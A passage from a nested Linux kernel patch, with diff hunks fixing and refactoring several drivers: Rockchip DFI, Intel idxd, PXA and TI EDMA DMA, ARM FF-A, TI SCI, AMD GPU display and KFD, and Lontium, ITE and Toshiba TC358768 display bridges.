+@@ -193,14 +193,15 @@ static int rockchip_dfi_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(data->clk),
+ 				     "Cannot get the clk pclk_ddr_mon\n");
+ 
+-	/* try to find the optional reference to the pmu syscon */
+ 	node = of_parse_phandle(np, "rockchip,pmu", 0);
+-	if (node) {
+-		data->regmap_pmu = syscon_node_to_regmap(node);
+-		of_node_put(node);
+-		if (IS_ERR(data->regmap_pmu))
+-			return PTR_ERR(data->regmap_pmu);
+-	}
++	if (!node)
++		return dev_err_probe(&pdev->dev, -ENODEV, "Can't find pmu_grf registers\n");
++
++	data->regmap_pmu = syscon_node_to_regmap(node);
++	of_node_put(node);
++	if (IS_ERR(data->regmap_pmu))
++		return PTR_ERR(data->regmap_pmu);
++
+ 	data->dev = dev;
+ 
+ 	desc = devm_kzalloc(dev, sizeof(*desc), GFP_KERNEL);
+diff --git a/drivers/dma/idxd/Makefile b/drivers/dma/idxd/Makefile
+index a1e9f2b3a37cc..817ffa95a9b11 100644
+--- a/drivers/dma/idxd/Makefile
++++ b/drivers/dma/idxd/Makefile
+@@ -1,12 +1,12 @@
+ ccflags-y += -DDEFAULT_SYMBOL_NAMESPACE=IDXD
+ 
++obj-$(CONFIG_INTEL_IDXD_BUS) += idxd_bus.o
++idxd_bus-y := bus.o
++
+ obj-$(CONFIG_INTEL_IDXD) += idxd.o
+ idxd-y := init.o irq.o device.o sysfs.o submit.o dma.o cdev.o
+ 
+ idxd-$(CONFIG_INTEL_IDXD_PERFMON) += perfmon.o
+ 
+-obj-$(CONFIG_INTEL_IDXD_BUS) += idxd_bus.o
+-idxd_bus-y := bus.o
+-
+ obj-$(CONFIG_INTEL_IDXD_COMPAT) += idxd_compat.o
+ idxd_compat-y := compat.o
+diff --git a/drivers/dma/pxa_dma.c b/drivers/dma/pxa_dma.c
+index 22a392fe6d32b..04c1f2ee874a5 100644
+--- a/drivers/dma/pxa_dma.c
++++ b/drivers/dma/pxa_dma.c
+@@ -722,7 +722,6 @@ static void pxad_free_desc(struct virt_dma_desc *vd)
+ 	dma_addr_t dma;
+ 	struct pxad_desc_sw *sw_desc = to_pxad_sw_desc(vd);
+ 
+-	BUG_ON(sw_desc->nb_desc == 0);
+ 	for (i = sw_desc->nb_desc - 1; i >= 0; i--) {
+ 		if (i > 0)
+ 			dma = sw_desc->hw_desc[i - 1]->ddadr;
+diff --git a/drivers/dma/ti/edma.c b/drivers/dma/ti/edma.c
+index fa06d7e6d8e38..7ec6e5d728b03 100644
+--- a/drivers/dma/ti/edma.c
++++ b/drivers/dma/ti/edma.c
+@@ -2410,7 +2410,7 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq < 0 && node)
+ 		irq = irq_of_parse_and_map(node, 0);
+ 
+-	if (irq >= 0) {
++	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccint",
+ 					  dev_name(dev));
+ 		ret = devm_request_irq(dev, irq, dma_irq_handler, 0, irq_name,
+@@ -2426,7 +2426,7 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq < 0 && node)
+ 		irq = irq_of_parse_and_map(node, 2);
+ 
+-	if (irq >= 0) {
++	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccerrint",
+ 					  dev_name(dev));
+ 		ret = devm_request_irq(dev, irq, dma_ccerr_handler, 0, irq_name,
+diff --git a/drivers/firmware/arm_ffa/bus.c b/drivers/firmware/arm_ffa/bus.c
+index b9ce784f087df..248594b59c64d 100644
+--- a/drivers/firmware/arm_ffa/bus.c
++++ b/drivers/firmware/arm_ffa/bus.c
+@@ -193,6 +193,7 @@ struct ffa_device *ffa_device_register(const uuid_t *uuid, int vm_id,
+ 	dev->release = ffa_release_device;
+ 	dev_set_name(&ffa_dev->dev, "arm-ffa-%d", id);
+ 
++	ffa_dev->id = id;
+ 	ffa_dev->vm_id = vm_id;
+ 	ffa_dev->ops = ops;
+ 	uuid_copy(&ffa_dev->uuid, uuid);
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index 21481fc05800f..e9f86b7573012 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -668,17 +668,9 @@ static int ffa_partition_info_get(const char *uuid_str,
+ 	return 0;
+ }
+ 
+-static void _ffa_mode_32bit_set(struct ffa_device *dev)
+-{
+-	dev->mode_32bit = true;
+-}
+-
+ static void ffa_mode_32bit_set(struct ffa_device *dev)
+ {
+-	if (drv_info->version > FFA_VERSION_1_0)
+-		return;
+-
+-	_ffa_mode_32bit_set(dev);
++	dev->mode_32bit = true;
+ }
+ 
+ static int ffa_sync_send_receive(struct ffa_device *dev,
+@@ -787,7 +779,7 @@ static void ffa_setup_partitions(void)
+ 
+ 		if (drv_info->version > FFA_VERSION_1_0 &&
+ 		    !(tpbuf->properties & FFA_PARTITION_AARCH64_EXEC))
+-			_ffa_mode_32bit_set(ffa_dev);
++			ffa_mode_32bit_set(ffa_dev);
+ 	}
+ 	kfree(pbuf);
+ }
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index 4c550cfbc086c..597d1a367d96d 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -190,19 +190,6 @@ static int ti_sci_debugfs_create(struct platform_device *pdev,
+ 	return 0;
+ }
+ 
+-/**
+- * ti_sci_debugfs_destroy() - clean up log debug file
+- * @pdev:	platform device pointer
+- * @info:	Pointer to SCI entity information
+- */
+-static void ti_sci_debugfs_destroy(struct platform_device *pdev,
+-				   struct ti_sci_info *info)
+-{
+-	if (IS_ERR(info->debug_region))
+-		return;
+-
+-	debugfs_remove(info->d);
+-}
+ #else /* CONFIG_DEBUG_FS */
+ static inline int ti_sci_debugfs_create(struct platform_device *dev,
+ 					struct ti_sci_info *info)
+@@ -3451,43 +3438,12 @@ out:
+ 	return ret;
+ }
+ 
+-static int ti_sci_remove(struct platform_device *pdev)
+-{
+-	struct ti_sci_info *info;
+-	struct device *dev = &pdev->dev;
+-	int ret = 0;
+-
+-	of_platform_depopulate(dev);
+-
+-	info = platform_get_drvdata(pdev);
+-
+-	if (info->nb.notifier_call)
+-		unregister_restart_handler(&info->nb);
+-
+-	mutex_lock(&ti_sci_list_mutex);
+-	if (info->users)
+-		ret = -EBUSY;
+-	else
+-		list_del(&info->node);
+-	mutex_unlock(&ti_sci_list_mutex);
+-
+-	if (!ret) {
+-		ti_sci_debugfs_destroy(pdev, info);
+-
+-		/* Safe to free channels since no more users */
+-		mbox_free_channel(info->chan_tx);
+-		mbox_free_channel(info->chan_rx);
+-	}
+-
+-	return ret;
+-}
+-
+ static struct platform_driver ti_sci_driver = {
+ 	.probe = ti_sci_probe,
+-	.remove = ti_sci_remove,
+ 	.driver = {
+ 		   .name = "ti-sci",
+ 		   .of_match_table = of_match_ptr(ti_sci_of_match),
++		   .suppress_bind_attrs = true,
+ 	},
+ };
+ module_platform_driver(ti_sci_driver);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index 63feea08904cb..d7e758c86a0b8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -487,11 +487,11 @@ svm_range_validate_svm_bo(struct amdgpu_device *adev, struct svm_range *prange)
+ 
+ 	/* We need a new svm_bo. Spin-loop to wait for concurrent
+ 	 * svm_range_bo_release to finish removing this range from
+-	 * its range list. After this, it is safe to reuse the
+-	 * svm_bo pointer and svm_bo_list head.
++	 * its range list and set prange->svm_bo to null. After this,
++	 * it is safe to reuse the svm_bo pointer and svm_bo_list head.
+ 	 */
+-	while (!list_empty_careful(&prange->svm_bo_list))
+-		;
++	while (!list_empty_careful(&prange->svm_bo_list) || prange->svm_bo)
++		cond_resched();
+ 
+ 	return false;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 339f1f5a08339..42e266e074d1d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -9626,16 +9626,27 @@ static void dm_get_oriented_plane_size(struct drm_plane_state *plane_state,
+ 	}
+ }
+ 
++static void
++dm_get_plane_scale(struct drm_plane_state *plane_state,
++		   int *out_plane_scale_w, int *out_plane_scale_h)
++{
++	int plane_src_w, plane_src_h;
++
++	dm_get_oriented_plane_size(plane_state, &plane_src_w, &plane_src_h);
++	*out_plane_scale_w = plane_state->crtc_w * 1000 / plane_src_w;
++	*out_plane_scale_h = plane_state->crtc_h * 1000 / plane_src_h;
++}
++
+ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 				struct drm_crtc *crtc,
+ 				struct drm_crtc_state *new_crtc_state)
+ {
+-	struct drm_plane *cursor = crtc->cursor, *underlying;
++	struct drm_plane *cursor = crtc->cursor, *plane, *underlying;
++	struct drm_plane_state *old_plane_state, *new_plane_state;
+ 	struct drm_plane_state *new_cursor_state, *new_underlying_state;
+ 	int i;
+ 	int cursor_scale_w, cursor_scale_h, underlying_scale_w, underlying_scale_h;
+-	int cursor_src_w, cursor_src_h;
+-	int underlying_src_w, underlying_src_h;
++	bool any_relevant_change = false;
+ 
+ 	/* On DCE and DCN there is no dedicated hardware cursor plane. We get a
+ 	 * cursor per pipe but it's going to inherit the scaling and
+@@ -9643,13 +9654,50 @@ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 	 * blending properties match the underlying planes'.
+ 	 */
+ 
+-	new_cursor_state = drm_atomic_get_new_plane_state(state, cursor);
+-	if (!new_cursor_state || !new_cursor_state->fb)
++	/* If no plane was enabled or changed scaling, no need to check again */
++	for_each_oldnew_plane_in_state(state, plane, old_plane_state, new_plane_state, i) {
++		int new_scale_w, new_scale_h, old_scale_w, old_scale_h;
++
++		if (!new_plane_state || !new_plane_state->fb || new_plane_state->crtc != crtc)
++			continue;
++
++		if (!old_plane_state || !old_plane_state->fb || old_plane_state->crtc != crtc) {
++			any_relevant_change = true;
++			break;
++		}
++
++		if (new_plane_state->fb == old_plane_state->fb &&
++		    new_plane_state->crtc_w == old_plane_state->crtc_w &&
++		    new_plane_state->crtc_h == old_plane_state->crtc_h)
++			continue;
++
++		dm_get_plane_scale(new_plane_state, &new_scale_w, &new_scale_h);
++		dm_get_plane_scale(old_plane_state, &old_scale_w, &old_scale_h);
++
++		if (new_scale_w != old_scale_w || new_scale_h != old_scale_h) {
++			any_relevant_change = true;
++			break;
++		}
++	}
++
++	if (!any_relevant_change)
++		return 0;
++
++	new_cursor_state = drm_atomic_get_plane_state(state, cursor);
++	if (IS_ERR(new_cursor_state))
++		return PTR_ERR(new_cursor_state);
++
++	if (!new_cursor_state->fb)
+ 		return 0;
+ 
+-	dm_get_oriented_plane_size(new_cursor_state, &cursor_src_w, &cursor_src_h);
+-	cursor_scale_w = new_cursor_state->crtc_w * 1000 / cursor_src_w;
+-	cursor_scale_h = new_cursor_state->crtc_h * 1000 / cursor_src_h;
++	dm_get_plane_scale(new_cursor_state, &cursor_scale_w, &cursor_scale_h);
++
++	/* Need to check all enabled planes, even if this commit doesn't change
++	 * their state
++	 */
++	i = drm_atomic_add_affected_planes(state, crtc);
++	if (i)
++		return i;
+ 
+ 	for_each_new_plane_in_state_reverse(state, underlying, new_underlying_state, i) {
+ 		/* Narrow down to non-cursor planes on the same CRTC as the cursor */
+@@ -9660,10 +9708,8 @@ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 		if (!new_underlying_state->fb)
+ 			continue;
+ 
+-		dm_get_oriented_plane_size(new_underlying_state,
+-					   &underlying_src_w, &underlying_src_h);
+-		underlying_scale_w = new_underlying_state->crtc_w * 1000 / underlying_src_w;
+-		underlying_scale_h = new_underlying_state->crtc_h * 1000 / underlying_src_h;
++		dm_get_plane_scale(new_underlying_state,
++				   &underlying_scale_w, &underlying_scale_h);
+ 
+ 		if (cursor_scale_w != underlying_scale_w ||
+ 		    cursor_scale_h != underlying_scale_h) {
+diff --git a/drivers/gpu/drm/bridge/ite-it66121.c b/drivers/gpu/drm/bridge/ite-it66121.c
+index 4f6f1deba28c6..9d7f3c99748b4 100644
+--- a/drivers/gpu/drm/bridge/ite-it66121.c
++++ b/drivers/gpu/drm/bridge/ite-it66121.c
+@@ -1464,10 +1464,14 @@ static int it66121_audio_get_eld(struct device *dev, void *data,
+ 	struct it66121_ctx *ctx = dev_get_drvdata(dev);
+ 
+ 	mutex_lock(&ctx->lock);
+-
+-	memcpy(buf, ctx->connector->eld,
+-	       min(sizeof(ctx->connector->eld), len));
+-
++	if (!ctx->connector) {
++		/* Pass en empty ELD if connector not available */
++		dev_dbg(dev, "No connector present, passing empty EDID data");
++		memset(buf, 0, len);
++	} else {
++		memcpy(buf, ctx->connector->eld,
++		       min(sizeof(ctx->connector->eld), len));
++	}
+ 	mutex_unlock(&ctx->lock);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index 5e419934d2a39..ac76c23635892 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -45,7 +45,6 @@ struct lt8912 {
+ 
+ 	u8 data_lanes;
+ 	bool is_power_on;
+-	bool is_attached;
+ };
+ 
+ static int lt8912_write_init_config(struct lt8912 *lt)
+@@ -516,14 +515,27 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 	return 0;
+ }
+ 
++static void lt8912_bridge_hpd_cb(void *data, enum drm_connector_status status)
++{
++	struct lt8912 *lt = data;
++
++	if (lt->bridge.dev)
++		drm_helper_hpd_irq_event(lt->bridge.dev);
++}
++
+ static int lt8912_bridge_connector_init(struct drm_bridge *bridge)
+ {
+ 	int ret;
+ 	struct lt8912 *lt = bridge_to_lt8912(bridge);
+ 	struct drm_connector *connector = &lt->connector;
+ 
+-	connector->polled = DRM_CONNECTOR_POLL_CONNECT |
+-			    DRM_CONNECTOR_POLL_DISCONNECT;
++	if (lt->hdmi_port->ops & DRM_BRIDGE_OP_HPD) {
++		drm_bridge_hpd_enable(lt->hdmi_port, lt8912_bridge_hpd_cb, lt);
++		connector->polled = DRM_CONNECTOR_POLL_HPD;
++	} else {
++		connector->polled = DRM_CONNECTOR_POLL_CONNECT |
++				    DRM_CONNECTOR_POLL_DISCONNECT;
++	}
+ 
+ 	ret = drm_connector_init(bridge->dev, connector,
+ 				 &lt8912_connector_funcs,
+@@ -546,6 +558,13 @@ static int lt8912_bridge_attach(struct drm_bridge *bridge,
+ 	struct lt8912 *lt = bridge_to_lt8912(bridge);
+ 	int ret;
+ 
++	ret = drm_bridge_attach(bridge->encoder, lt->hdmi_port, bridge,
++				DRM_BRIDGE_ATTACH_NO_CONNECTOR);
++	if (ret < 0) {
++		dev_err(lt->dev, "Failed to attach next bridge (%d)\n", ret);
++		return ret;
++	}
++
+ 	if (!(flags & DRM_BRIDGE_ATTACH_NO_CONNECTOR)) {
+ 		ret = lt8912_bridge_connector_init(bridge);
+ 		if (ret) {
+@@ -562,8 +581,6 @@ static int lt8912_bridge_attach(struct drm_bridge *bridge,
+ 	if (ret)
+ 		goto error;
+ 
+-	lt->is_attached = true;
+-
+ 	return 0;
+ 
+ error:
+@@ -575,11 +592,10 @@ static void lt8912_bridge_detach(struct drm_bridge *bridge)
+ {
+ 	struct lt8912 *lt = bridge_to_lt8912(bridge);
+ 
+-	if (lt->is_attached) {
+-		lt8912_hard_power_off(lt);
+-		drm_connector_unregister(&lt->connector);
+-		drm_connector_cleanup(&lt->connector);
+-	}
++	lt8912_hard_power_off(lt);
++
++	if (lt->connector.dev && lt->hdmi_port->ops & DRM_BRIDGE_OP_HPD)
++		drm_bridge_hpd_disable(lt->hdmi_port);
+ }
+ 
+ static enum drm_connector_status
+@@ -734,7 +750,6 @@ static void lt8912_remove(struct i2c_client *client)
+ {
+ 	struct lt8912 *lt = i2c_get_clientdata(client);
+ 
+-	lt8912_bridge_detach(&lt->bridge);
+ 	drm_bridge_remove(&lt->bridge);
+ 	lt8912_free_i2c(lt);
+ 	lt8912_put_dt(lt);
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+index fa1ee6264d921..818848b2c04dd 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+@@ -928,9 +928,9 @@ retry:
+ 	init_waitqueue_head(&lt9611uxc->wq);
+ 	INIT_WORK(&lt9611uxc->work, lt9611uxc_hpd_work);
+ 
+-	ret = devm_request_threaded_irq(dev, client->irq, NULL,
+-					lt9611uxc_irq_thread_handler,
+-					IRQF_ONESHOT, "lt9611uxc", lt9611uxc);
++	ret = request_threaded_irq(client->irq, NULL,
++				   lt9611uxc_irq_thread_handler,
++				   IRQF_ONESHOT, "lt9611uxc", lt9611uxc);
+ 	if (ret) {
+ 		dev_err(dev, "failed to request irq\n");
+ 		goto err_disable_regulators;
+@@ -966,6 +966,8 @@ retry:
+ 	return lt9611uxc_audio_init(dev, lt9611uxc);
+ 
+ err_remove_bridge:
++	free_irq(client->irq, lt9611uxc);
++	cancel_work_sync(&lt9611uxc->work);
+ 	drm_bridge_remove(&lt9611uxc->bridge);
+ 
+ err_disable_regulators:
+@@ -982,7 +984,7 @@ static void lt9611uxc_remove(struct i2c_client *client)
+ {
+ 	struct lt9611uxc *lt9611uxc = i2c_get_clientdata(client);
+ 
+-	disable_irq(client->irq);
++	free_irq(client->irq, lt9611uxc);
+ 	cancel_work_sync(&lt9611uxc->work);
+ 	lt9611uxc_audio_exit(lt9611uxc);
+ 	drm_bridge_remove(&lt9611uxc->bridge);
+diff --git a/drivers/gpu/drm/bridge/tc358768.c b/drivers/gpu/drm/bridge/tc358768.c
+index 2d0ac9987b58e..8429b6518b502 100644
+--- a/drivers/gpu/drm/bridge/tc358768.c
++++ b/drivers/gpu/drm/bridge/tc358768.c
+@@ -15,6 +15,7 @@
+ #include <linux/regmap.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/slab.h>
++#include <linux/units.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_crtc_helper.h>
+@@ -217,6 +218,10 @@ static void tc358768_update_bits(struct tc358768_priv *priv, u32 reg, u32 mask,
+ 	u32 tmp, orig;
+ 
+ 	tc358768_read(priv, reg, &orig);
++
++	if (priv->error)
++		return;
++
+ 	tmp = orig & ~mask;
+ 	tmp |= val & mask;
+ 	if (tmp != orig)
+@@ -601,7 +606,7 @@ static int tc358768_setup_pll(struct tc358768_priv *priv,
+ 
+ 	dev_dbg(priv->dev, "PLL: refclk %lu, fbd %u, prd %u, frs %u\n",
+ 		clk_get_rate(priv->refclk), fbd, prd, frs);
+-	dev_dbg(priv->dev, "PLL: pll_clk: %u, DSIClk %u, DSIByteClk %u\n",
++	dev_dbg(priv->dev, "PLL: pll_clk: %u, DSIClk %u, HSByteClk %u\n",
+ 		priv->dsiclk * 2, priv->dsiclk, priv->dsiclk / 4);
+ 	dev_dbg(priv->dev, "PLL: pclk %u (panel: %u)\n",
+ 		tc358768_pll_to_pclk(priv, priv->dsiclk * 2),
+@@ -624,15 +629,14 @@ static int tc358768_setup_pll(struct tc358768_priv *priv,
+ 	return tc358768_clear_error(priv);
+ }
+ 
+-#define TC358768_PRECISION	1000
+-static u32 tc358768_ns_to_cnt(u32 ns, u32 period_nsk)
++static u32 tc358768_ns_to_cnt(u32 ns, u32 period_ps)
+ {
+-	return (ns * TC358768_PRECISION + period_nsk) / period_nsk;
++	return DIV_ROUND_UP(ns * 1000, period_ps);
+ }
+ 
+-static u32 tc358768_to_ns(u32 nsk)
++static u32 tc358768_ps_to_ns(u32 ps)
+ {
+-	return (nsk / TC358768_PRECISION);
++	return ps / 1000;
+ }
+ 
+ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+@@ -643,13 +647,15 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	u32 val, val2, lptxcnt, hact, data_type;
+ 	s32 raw_val;
+ 	const struct drm_display_mode *mode;
+-	u32 dsibclk_nsk, dsiclk_nsk, ui_nsk, phy_delay_nsk;
+-	u32 dsiclk, dsibclk, video_start;
++	u32 hsbyteclk_ps, dsiclk_ps, ui_ps;
++	u32 dsiclk, hsbyteclk, video_start;
+ 	const u32 internal_delay = 40;
+ 	int ret, i;
++	struct videomode vm;
++	struct device *dev = priv->dev;
+ 
+ 	if (mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS) {
+-		dev_warn_once(priv->dev, "Non-continuous mode unimplemented, falling back to continuous\n");
++		dev_warn_once(dev, "Non-continuous mode unimplemented, falling back to continuous\n");
+ 		mode_flags &= ~MIPI_DSI_CLOCK_NON_CONTINUOUS;
+ 	}
+ 
+@@ -657,7 +663,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	ret = tc358768_sw_reset(priv);
+ 	if (ret) {
+-		dev_err(priv->dev, "Software reset failed: %d\n", ret);
++		dev_err(dev, "Software reset failed: %d\n", ret);
+ 		tc358768_hw_disable(priv);
+ 		return;
+ 	}
+@@ -665,45 +671,47 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	mode = &bridge->encoder->crtc->state->adjusted_mode;
+ 	ret = tc358768_setup_pll(priv, mode);
+ 	if (ret) {
+-		dev_err(priv->dev, "PLL setup failed: %d\n", ret);
++		dev_err(dev, "PLL setup failed: %d\n", ret);
+ 		tc358768_hw_disable(priv);
+ 		return;
+ 	}
+ 
++	drm_display_mode_to_videomode(mode, &vm);
++
+ 	dsiclk = priv->dsiclk;
+-	dsibclk = dsiclk / 4;
++	hsbyteclk = dsiclk / 4;
+ 
+ 	/* Data Format Control Register */
+ 	val = BIT(2) | BIT(1) | BIT(0); /* rdswap_en | dsitx_en | txdt_en */
+ 	switch (dsi_dev->format) {
+ 	case MIPI_DSI_FMT_RGB888:
+ 		val |= (0x3 << 4);
+-		hact = mode->hdisplay * 3;
+-		video_start = (mode->htotal - mode->hsync_start) * 3;
++		hact = vm.hactive * 3;
++		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_24;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+ 		val |= (0x4 << 4);
+-		hact = mode->hdisplay * 3;
+-		video_start = (mode->htotal - mode->hsync_start) * 3;
++		hact = vm.hactive * 3;
++		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+ 		val |= (0x4 << 4) | BIT(3);
+-		hact = mode->hdisplay * 18 / 8;
+-		video_start = (mode->htotal - mode->hsync_start) * 18 / 8;
++		hact = vm.hactive * 18 / 8;
++		video_start = (vm.hsync_len + vm.hback_porch) * 18 / 8;
+ 		data_type = MIPI_DSI_PIXEL_STREAM_3BYTE_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB565:
+ 		val |= (0x5 << 4);
+-		hact = mode->hdisplay * 2;
+-		video_start = (mode->htotal - mode->hsync_start) * 2;
++		hact = vm.hactive * 2;
++		video_start = (vm.hsync_len + vm.hback_porch) * 2;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_16;
+ 		break;
+ 	default:
+-		dev_err(priv->dev, "Invalid data format (%u)\n",
++		dev_err(dev, "Invalid data format (%u)\n",
+ 			dsi_dev->format);
+ 		tc358768_hw_disable(priv);
+ 		return;
+@@ -723,69 +731,67 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		tc358768_write(priv, TC358768_D0W_CNTRL + i * 4, 0x0000);
+ 
+ 	/* DSI Timings */
+-	dsibclk_nsk = (u32)div_u64((u64)1000000000 * TC358768_PRECISION,
+-				  dsibclk);
+-	dsiclk_nsk = (u32)div_u64((u64)1000000000 * TC358768_PRECISION, dsiclk);
+-	ui_nsk = dsiclk_nsk / 2;
+-	phy_delay_nsk = dsibclk_nsk + 2 * dsiclk_nsk;
+-	dev_dbg(priv->dev, "dsiclk_nsk: %u\n", dsiclk_nsk);
+-	dev_dbg(priv->dev, "ui_nsk: %u\n", ui_nsk);
+-	dev_dbg(priv->dev, "dsibclk_nsk: %u\n", dsibclk_nsk);
+-	dev_dbg(priv->dev, "phy_delay_nsk: %u\n", phy_delay_nsk);
++	hsbyteclk_ps = (u32)div_u64(PICO, hsbyteclk);
++	dsiclk_ps = (u32)div_u64(PICO, dsiclk);
++	ui_ps = dsiclk_ps / 2;
++	dev_dbg(dev, "dsiclk: %u ps, ui %u ps, hsbyteclk %u ps\n", dsiclk_ps,
++		ui_ps, hsbyteclk_ps);
+ 
+ 	/* LP11 > 100us for D-PHY Rx Init */
+-	val = tc358768_ns_to_cnt(100 * 1000, dsibclk_nsk) - 1;
+-	dev_dbg(priv->dev, "LINEINITCNT: 0x%x\n", val);
++	val = tc358768_ns_to_cnt(100 * 1000, hsbyteclk_ps) - 1;
++	dev_dbg(dev, "LINEINITCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_LINEINITCNT, val);
+ 
+ 	/* LPTimeCnt > 50ns */
+-	val = tc358768_ns_to_cnt(50, dsibclk_nsk) - 1;
++	val = tc358768_ns_to_cnt(50, hsbyteclk_ps) - 1;
+ 	lptxcnt = val;
+-	dev_dbg(priv->dev, "LPTXTIMECNT: 0x%x\n", val);
++	dev_dbg(dev, "LPTXTIMECNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_LPTXTIMECNT, val);
+ 
+ 	/* 38ns < TCLK_PREPARE < 95ns */
+-	val = tc358768_ns_to_cnt(65, dsibclk_nsk) - 1;
++	val = tc358768_ns_to_cnt(65, hsbyteclk_ps) - 1;
++	dev_dbg(dev, "TCLK_PREPARECNT %u\n", val);
+ 	/* TCLK_PREPARE + TCLK_ZERO > 300ns */
+-	val2 = tc358768_ns_to_cnt(300 - tc358768_to_ns(2 * ui_nsk),
+-				  dsibclk_nsk) - 2;
++	val2 = tc358768_ns_to_cnt(300 - tc358768_ps_to_ns(2 * ui_ps),
++				  hsbyteclk_ps) - 2;
++	dev_dbg(dev, "TCLK_ZEROCNT %u\n", val2);
+ 	val |= val2 << 8;
+-	dev_dbg(priv->dev, "TCLK_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_HEADERCNT, val);
+ 
+ 	/* TCLK_TRAIL > 60ns AND TEOT <= 105 ns + 12*UI */
+-	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(2 * ui_nsk), dsibclk_nsk) - 5;
++	raw_val = tc358768_ns_to_cnt(60 + tc358768_ps_to_ns(2 * ui_ps), hsbyteclk_ps) - 5;
+ 	val = clamp(raw_val, 0, 127);
+-	dev_dbg(priv->dev, "TCLK_TRAILCNT: 0x%x\n", val);
++	dev_dbg(dev, "TCLK_TRAILCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_TRAILCNT, val);
+ 
+ 	/* 40ns + 4*UI < THS_PREPARE < 85ns + 6*UI */
+-	val = 50 + tc358768_to_ns(4 * ui_nsk);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 1;
++	val = 50 + tc358768_ps_to_ns(4 * ui_ps);
++	val = tc358768_ns_to_cnt(val, hsbyteclk_ps) - 1;
++	dev_dbg(dev, "THS_PREPARECNT %u\n", val);
+ 	/* THS_PREPARE + THS_ZERO > 145ns + 10*UI */
+-	raw_val = tc358768_ns_to_cnt(145 - tc358768_to_ns(3 * ui_nsk), dsibclk_nsk) - 10;
++	raw_val = tc358768_ns_to_cnt(145 - tc358768_ps_to_ns(3 * ui_ps), hsbyteclk_ps) - 10;
+ 	val2 = clamp(raw_val, 0, 127);
++	dev_dbg(dev, "THS_ZEROCNT %u\n", val2);
+ 	val |= val2 << 8;
+-	dev_dbg(priv->dev, "THS_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_THS_HEADERCNT, val);
+ 
+ 	/* TWAKEUP > 1ms in lptxcnt steps */
+-	val = tc358768_ns_to_cnt(1020000, dsibclk_nsk);
++	val = tc358768_ns_to_cnt(1020000, hsbyteclk_ps);
+ 	val = val / (lptxcnt + 1) - 1;
+-	dev_dbg(priv->dev, "TWAKEUP: 0x%x\n", val);
++	dev_dbg(dev, "TWAKEUP: %u\n", val);
+ 	tc358768_write(priv, TC358768_TWAKEUP, val);
+ 
+ 	/* TCLK_POSTCNT > 60ns + 52*UI */
+-	val = tc358768_ns_to_cnt(60 + tc358768_to_ns(52 * ui_nsk),
+-				 dsibclk_nsk) - 3;
+-	dev_dbg(priv->dev, "TCLK_POSTCNT: 0x%x\n", val);
++	val = tc358768_ns_to_cnt(60 + tc358768_ps_to_ns(52 * ui_ps),
++				 hsbyteclk_ps) - 3;
++	dev_dbg(dev, "TCLK_POSTCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_POSTCNT, val);
+ 
+ 	/* max(60ns + 4*UI, 8*UI) < THS_TRAILCNT < 105ns + 12*UI */
+-	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(18 * ui_nsk),
+-				     dsibclk_nsk) - 4;
